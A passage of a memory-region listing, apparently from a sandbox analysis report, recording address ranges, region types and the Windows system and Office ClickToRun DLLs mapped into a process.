0x61da70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d8f0000" filename = "" Region: id = 5290 start_va = 0x61da80000 end_va = 0x61db3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061da80000" filename = "" Region: id = 5291 start_va = 0x61db40000 end_va = 0x61de76fff entry_point = 0x61db40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5292 start_va = 0x61de80000 end_va = 0x61df7ffff entry_point = 0x0 region_type = private name = "private_0x000000061de80000" filename = "" Region: id = 5293 start_va = 0x61df80000 end_va = 0x61e07ffff entry_point = 0x0 region_type = private name = "private_0x000000061df80000" filename = "" Region: id = 5294 start_va = 0x61e080000 end_va = 0x61e17ffff entry_point = 0x0 region_type = private name = "private_0x000000061e080000" filename = "" Region: id = 5295 start_va = 0x61e180000 end_va = 0x61e27ffff entry_point = 0x0 region_type = private name = "private_0x000000061e180000" filename = "" Region: id = 5296 start_va = 0x61e280000 end_va = 0x61e37ffff entry_point = 0x0 region_type = private name = "private_0x000000061e280000" filename = "" Region: id = 5297 start_va = 0x61e380000 end_va = 0x61e47ffff entry_point = 0x0 region_type = private name = "private_0x000000061e380000" filename = "" Region: id = 5298 start_va = 0x61e480000 end_va = 0x61e57ffff entry_point = 0x0 region_type = private name = "private_0x000000061e480000" filename = "" Region: id = 5299 start_va = 0x61e580000 end_va = 0x61e77ffff entry_point = 0x0 region_type = private name = "private_0x000000061e580000" filename = "" Region: id = 5300 start_va = 0x61e780000 end_va = 0x61e87ffff entry_point = 0x0 region_type = private name = "private_0x000000061e780000" filename = "" Region: id = 5301 start_va = 0x61e880000 end_va = 0x61e97ffff entry_point = 0x0 region_type = private name = "private_0x000000061e880000" filename = "" Region: id = 5302 start_va = 0x61e980000 end_va = 0x61ea8ffff entry_point = 0x0 region_type = private name = "private_0x000000061e980000" filename = "" Region: id = 5303 start_va = 0x61ea90000 end_va = 0x61ec95fff entry_point = 0x0 region_type = private name = "private_0x000000061ea90000" filename = "" Region: id = 5304 start_va = 0x61eca0000 end_va = 0x61ed9ffff entry_point = 0x0 region_type = private name = "private_0x000000061eca0000" filename = "" Region: id = 5305 start_va = 0x61eda0000 end_va = 0x61ee9ffff entry_point = 0x0 region_type = private name = "private_0x000000061eda0000" filename = "" Region: id = 5306 start_va = 0x61eea0000 end_va = 0x61eea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061eea0000" filename = "" Region: id = 5307 start_va = 0x61eeb0000 end_va = 0x61eeb0fff entry_point = 0x61eeb0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 5308 start_va = 0x61eec0000 end_va = 0x61eec6fff entry_point = 0x0 region_type = private name = "private_0x000000061eec0000" filename = "" Region: id = 5309 start_va = 0x61eed0000 end_va = 0x61eed0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061eed0000" filename = "" Region: id = 5310 start_va = 0x61eee0000 end_va = 0x61eee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061eee0000" filename = "" Region: id = 5311 start_va = 0x61eef0000 end_va = 0x61eefffff entry_point = 0x0 region_type = private name = "private_0x000000061eef0000" filename = "" Region: id = 5312 start_va = 0x61ef00000 end_va = 0x61efdefff entry_point = 0x61ef00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5313 start_va = 0x61efe0000 end_va = 0x61f0dffff entry_point = 0x0 region_type = private name = "private_0x000000061efe0000" filename = "" Region: id = 5314 start_va = 0x61f0e0000 end_va = 0x61f2dffff entry_point = 0x0 region_type = private name = "private_0x000000061f0e0000" filename = "" Region: id = 5315 start_va = 0x61f2e0000 end_va = 0x61f2e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061f2e0000" filename = "" Region: id = 5316 start_va = 0x61f2f0000 end_va = 0x61f2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061f2f0000" filename = "" Region: id = 5317 start_va = 0x61f300000 end_va = 0x61f300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061f300000" filename = "" Region: id = 5318 start_va = 0x61f310000 end_va = 0x61f314fff entry_point = 0x61f310000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 5319 start_va = 0x61f320000 end_va = 0x61f32ffff entry_point = 0x61f320000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 5320 start_va = 0x61f330000 end_va = 0x61f330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061f330000" filename = "" Region: id = 5321 start_va = 0x61f340000 end_va = 0x61f340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061f340000" filename = "" Region: id = 5322 start_va = 0x61f350000 end_va = 0x61f44ffff entry_point = 0x0 region_type = private name = "private_0x000000061f350000" filename = "" Region: id = 5323 start_va = 0x61f450000 end_va = 0x61f450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061f450000" filename = "" Region: id = 5324 start_va = 0x61f460000 end_va = 0x61f85ffff entry_point = 0x0 region_type = private name = "private_0x000000061f460000" filename = "" Region: id = 5325 start_va = 0x61f860000 end_va = 0x61f860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061f860000" filename = "" Region: id = 5326 start_va = 0x61f870000 end_va = 0x61f870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061f870000" filename = "" Region: id = 5327 start_va = 0x61f880000 end_va = 0x61f97ffff entry_point = 0x0 region_type = private name = "private_0x000000061f880000" filename = "" Region: id = 5328 start_va = 0x61f980000 end_va = 0x61f982fff entry_point = 0x61f980000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 5329 start_va = 0x61fa90000 end_va = 0x61fb8ffff entry_point = 0x0 region_type = private name = "private_0x000000061fa90000" filename = "" Region: id = 5330 start_va = 0x61fd90000 end_va = 0x61fe8ffff entry_point = 0x0 region_type = private name = "private_0x000000061fd90000" filename = "" Region: id = 5331 start_va = 0x61fe90000 end_va = 0x61ff8ffff entry_point = 0x0 region_type = private name = "private_0x000000061fe90000" filename = "" Region: id = 5332 start_va = 0x61ff90000 end_va = 0x61ff99fff entry_point = 0x61ff90000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 5333 start_va = 0x6201a0000 end_va = 0x62029ffff entry_point = 0x0 region_type = private name = "private_0x00000006201a0000" filename = "" Region: id = 5334 start_va = 0x6202a0000 end_va = 0x62069ffff entry_point = 0x0 region_type = private name = "private_0x00000006202a0000" filename = "" Region: id = 5335 start_va = 0x6206a0000 end_va = 0x620e9ffff entry_point = 0x0 region_type = private name = "private_0x00000006206a0000" filename = "" Region: id = 5336 start_va = 0x620ea0000 end_va = 0x621e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000620ea0000" filename = "" Region: id = 5337 start_va = 0x6225a0000 end_va = 0x62356ffff entry_point = 0x0 region_type = private name = "private_0x00000006225a0000" filename = "" Region: id = 5338 start_va = 0x623d80000 end_va = 0x624d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000623d80000" filename = "" Region: id = 5339 start_va = 0x7df5fffd0000 end_va = 0x7ff5fffcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffd0000" filename = "" Region: id = 5340 start_va = 0x7ff7cbf6e000 end_va = 0x7ff7cbf6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf6e000" filename = "" Region: id = 5341 start_va = 0x7ff7cbf70000 end_va = 0x7ff7cbf71fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf70000" filename = "" Region: id = 5342 start_va = 0x7ff7cbf72000 end_va = 0x7ff7cbf73fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf72000" filename = "" Region: id = 5343 start_va = 0x7ff7cbf78000 end_va = 0x7ff7cbf79fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf78000" filename = "" Region: id = 5344 start_va = 0x7ff7cbf7c000 end_va = 0x7ff7cbf7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf7c000" filename = "" Region: id = 5345 start_va = 0x7ff7cbf7e000 end_va = 0x7ff7cbf7ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf7e000" filename = "" Region: id = 5346 start_va = 0x7ff7cbf80000 end_va = 0x7ff7cbf81fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf80000" filename = "" Region: id = 5347 start_va = 0x7ff7cbf82000 end_va = 0x7ff7cbf83fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf82000" filename = "" Region: id = 5348 start_va = 0x7ff7cbf84000 end_va = 0x7ff7cbf85fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf84000" filename = "" Region: id = 5349 start_va = 0x7ff7cbf86000 end_va = 0x7ff7cbf87fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf86000" filename = "" Region: id = 5350 start_va = 0x7ff7cbf88000 end_va = 0x7ff7cbf89fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf88000" filename = "" Region: id = 5351 start_va = 0x7ff7cbf8a000 end_va = 0x7ff7cbf8bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf8a000" filename = "" Region: id = 5352 start_va = 0x7ff7cbf8c000 end_va = 0x7ff7cbf8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf8c000" filename = "" Region: id = 5353 start_va = 0x7ff7cbf8e000 end_va = 0x7ff7cbf8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cbf8e000" filename = "" Region: id = 5354 start_va = 0x7ff7cbf90000 end_va = 0x7ff7cc08ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7cbf90000" filename = "" Region: id = 5355 start_va = 0x7ff7cc090000 end_va = 0x7ff7cc0b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7cc090000" filename = "" Region: id = 5356 start_va = 0x7ff7cc0b4000 end_va = 0x7ff7cc0b5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cc0b4000" filename = "" Region: id = 5357 start_va = 0x7ff7cc0bc000 end_va = 0x7ff7cc0bcfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cc0bc000" filename = "" Region: id = 5358 start_va = 0x7ff7cc0be000 end_va = 0x7ff7cc0bffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cc0be000" filename = "" Region: id = 5359 start_va = 0x7ff7cc5d0000 end_va = 0x7ff7cce2bfff entry_point = 0x7ff7cc5d0000 region_type = mapped_file name = "officeclicktorun.exe" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe") Region: id = 5360 start_va = 0x7ffae9750000 end_va = 0x7ffae9763fff entry_point = 0x7ffae9750000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 5361 start_va = 0x7ffae9800000 end_va = 0x7ffae981efff entry_point = 0x7ffae9800000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 5362 start_va = 0x7ffae9820000 end_va = 0x7ffae986cfff entry_point = 0x7ffae9820000 region_type = mapped_file name = "appvfilesystemmetadata.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll") Region: id = 5363 start_va = 0x7ffae9870000 end_va = 0x7ffae99f5fff entry_point = 0x7ffae9870000 region_type = mapped_file name = "appvisvsubsystemcontroller.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll") Region: id = 5364 start_va = 0x7ffae9a00000 end_va = 0x7ffae9c30fff entry_point = 0x7ffae9a00000 region_type = mapped_file name = "appvintegration.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll") Region: id = 5365 start_va = 0x7ffae9c40000 end_va = 0x7ffae9cd7fff entry_point = 0x7ffae9c40000 region_type = mapped_file name = "appvisvvirtualization.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll") Region: id = 5366 start_va = 0x7ffae9ce0000 end_va = 0x7ffae9d89fff entry_point = 0x7ffae9ce0000 region_type = mapped_file name = "appvcatalog.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll") Region: id = 5367 start_va = 0x7ffae9e60000 end_va = 0x7ffae9f91fff entry_point = 0x7ffae9e60000 region_type = mapped_file name = "appvmanifest.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll") Region: id = 5368 start_va = 0x7ffaea060000 end_va = 0x7ffaea096fff entry_point = 0x7ffaea060000 region_type = mapped_file name = "appvisvstreamingmanager.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll") Region: id = 5369 start_va = 0x7ffaea0a0000 end_va = 0x7ffaea11ffff entry_point = 0x7ffaea0a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 5370 start_va = 0x7ffaea160000 end_va = 0x7ffaea24ffff entry_point = 0x7ffaea160000 region_type = mapped_file name = "appvorchestration.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll") Region: id = 5371 start_va = 0x7ffaea250000 end_va = 0x7ffaea33efff entry_point = 0x7ffaea250000 region_type = mapped_file name = "msvcr120.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll") Region: id = 5372 start_va = 0x7ffaea340000 end_va = 0x7ffaea3e5fff entry_point = 0x7ffaea340000 region_type = mapped_file name = "msvcp120.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll") Region: id = 5373 start_va = 0x7ffaea3f0000 end_va = 0x7ffaea530fff entry_point = 0x7ffaea3f0000 region_type = mapped_file name = "appvpolicy.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll") Region: id = 5374 start_va = 0x7ffaea540000 end_va = 0x7ffaea5bbfff entry_point = 0x7ffaea540000 region_type = mapped_file name = "appvisvapi.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll") Region: id = 5375 start_va = 0x7ffaea5e0000 end_va = 0x7ffaea856fff entry_point = 0x7ffaea5e0000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 5376 start_va = 0x7ffaea860000 end_va = 0x7ffaea876fff entry_point = 0x7ffaea860000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5377 start_va = 0x7ffaea9f0000 end_va = 0x7ffaeaa71fff entry_point = 0x7ffaea9f0000 region_type = mapped_file name = "msdelta.dll" filename = "\\Windows\\System32\\msdelta.dll" (normalized: "c:\\windows\\system32\\msdelta.dll") Region: id = 5378 start_va = 0x7ffaeaa80000 end_va = 0x7ffaeae67fff entry_point = 0x7ffaeaa80000 region_type = mapped_file name = "streamserver.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll") Region: id = 5379 start_va = 0x7ffaeb520000 end_va = 0x7ffaeb52dfff entry_point = 0x7ffaeb520000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 5380 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 5381 start_va = 0x7ffaeb700000 end_va = 0x7ffaeb9a6fff entry_point = 0x7ffaeb700000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 5382 start_va = 0x7ffaeb9b0000 end_va = 0x7ffaebb46fff entry_point = 0x7ffaeb9b0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 5383 start_va = 0x7ffaebb50000 end_va = 0x7ffaebb5bfff entry_point = 0x7ffaebb50000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 5384 start_va = 0x7ffaebc80000 end_va = 0x7ffaebc94fff entry_point = 0x7ffaebc80000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 5385 start_va = 0x7ffaebd70000 end_va = 0x7ffaec0acfff entry_point = 0x7ffaebd70000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 5386 start_va = 0x7ffaec140000 end_va = 0x7ffaec17efff entry_point = 0x7ffaec140000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 5387 start_va = 0x7ffaec410000 end_va = 0x7ffaec419fff entry_point = 0x7ffaec410000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5388 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 5389 start_va = 0x7ffaedb10000 end_va = 0x7ffaede85fff entry_point = 0x7ffaedb10000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 5390 start_va = 0x7ffaef3a0000 end_va = 0x7ffaef3d1fff entry_point = 0x7ffaef3a0000 region_type = mapped_file name = "rstrtmgr.dll" filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll") Region: id = 5391 start_va = 0x7ffaef3e0000 end_va = 0x7ffaef419fff entry_point = 0x7ffaef3e0000 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 5392 start_va = 0x7ffaef420000 end_va = 0x7ffaef4befff entry_point = 0x7ffaef420000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 5393 start_va = 0x7ffaef4c0000 end_va = 0x7ffaef4d5fff entry_point = 0x7ffaef4c0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 5394 start_va = 0x7ffaef4e0000 end_va = 0x7ffaef506fff entry_point = 0x7ffaef4e0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 5395 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 5396 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 5397 start_va = 0x7ffaf02c0000 end_va = 0x7ffaf03b1fff entry_point = 0x7ffaf02c0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 5398 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 5399 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 5400 start_va = 0x7ffaf0920000 end_va = 0x7ffaf0987fff entry_point = 0x7ffaf0920000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 5401 start_va = 0x7ffaf0f60000 end_va = 0x7ffaf0f77fff entry_point = 0x7ffaf0f60000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5402 start_va = 0x7ffaf1380000 end_va = 0x7ffaf1395fff entry_point = 0x7ffaf1380000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5403 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5404 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5405 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5406 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 5407 start_va = 0x7ffaf3390000 end_va = 0x7ffaf3487fff entry_point = 0x7ffaf3390000 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 5408 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5409 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5410 start_va = 0x7ffaf3700000 end_va = 0x7ffaf3725fff entry_point = 0x7ffaf3700000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5411 start_va = 0x7ffaf3840000 end_va = 0x7ffaf38b3fff entry_point = 0x7ffaf3840000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 5412 start_va = 0x7ffaf38c0000 end_va = 0x7ffaf38c9fff entry_point = 0x7ffaf38c0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 5413 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5414 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5415 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5416 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5417 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5418 start_va = 0x7ffaf3ed0000 end_va = 0x7ffaf3f05fff entry_point = 0x7ffaf3ed0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 5419 start_va = 0x7ffaf4180000 end_va = 0x7ffaf41a5fff entry_point = 0x7ffaf4180000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 5420 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5421 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5422 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5423 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5424 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = 